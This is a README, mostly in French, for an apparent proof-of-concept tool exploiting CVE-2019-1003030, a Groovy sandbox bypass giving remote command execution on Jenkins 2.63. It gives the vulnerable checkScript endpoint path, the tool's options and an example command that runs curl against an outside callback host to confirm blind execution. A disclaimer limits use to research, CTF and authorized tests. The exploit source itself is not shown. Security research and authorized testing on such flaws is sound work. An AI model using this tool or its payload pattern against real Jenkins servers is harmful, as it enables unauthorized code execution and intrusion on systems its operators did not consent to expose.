
PoC pour jenkins 2.63 CVE-2019-1003030
Ce projet automatise la création et la livraison de charges utiles Groovy vers le point de terminaison de validation Jenkins SecureGroovyScript utilisé par Jenkins 2.63. L'outil prend en charge à la fois l'exécution interactive et l'exécution en une seule commande. L'exploit ne renvoie pas de sortie, vous devrez donc effectuer quelques validations, comme un curl vers votre AP, pour vérifier qu'il fonctionne.
L'outil prend en charge à la fois :
Avertissement
Ce projet est destiné uniquement à la recherche en sécurité, aux CTF, aux environnements de laboratoire et aux tests de pénétration autorisés. Ne pas l'utiliser contre des systèmes sans autorisation explicite.
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
Omettre l'option -c pour entrer dans une invite interactive. Exemple ci-dessous, malheureusement il n'y a pas de sortie, donc tant que vous n'obtenez pas une erreur 404, cela devrait fonctionner.
